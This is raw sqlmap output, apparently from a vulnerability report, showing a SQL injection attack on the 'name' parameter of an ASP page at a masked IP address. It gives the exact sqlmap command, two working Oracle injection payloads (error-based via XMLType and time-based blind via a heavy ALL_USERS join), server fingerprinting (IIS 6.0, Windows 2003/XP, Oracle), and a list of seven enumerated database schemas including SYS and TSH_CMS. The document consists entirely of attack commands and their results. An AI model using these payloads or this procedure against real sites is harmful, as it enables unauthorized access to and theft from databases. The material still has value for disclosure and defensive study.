./sqlmap.py -u "http://**.**.**.**:80/tmap/map_unicom_list.asp?province=31&type=1&name=1&companytype=11&page=1" -p name
---
Parameter: name (GET)
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: province=31&type=1&name=1' AND 8515=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(106)||CHR(112)||CHR(113)||CHR(113)||(SELECT (CASE WHEN (8515=8515) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(98)||CHR(122)||CHR(113)||CHR(113)||CHR(62))) FROM DUAL) AND 'WRhY' LIKE 'WRhY&companytype=11&page=1

    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind (heavy query)
    Payload: province=31&type=1&name=1' AND 7020=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND 'UZfg' LIKE 'UZfg&companytype=11&page=1
---
[12:01:22] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Oracle
available databases [7]:
[*] CTXSYS
[*] EXFSYS
[*] MDSYS
[*] OLAPSYS
[*] SYS
[*] SYSTEM
[*] TSH_CMS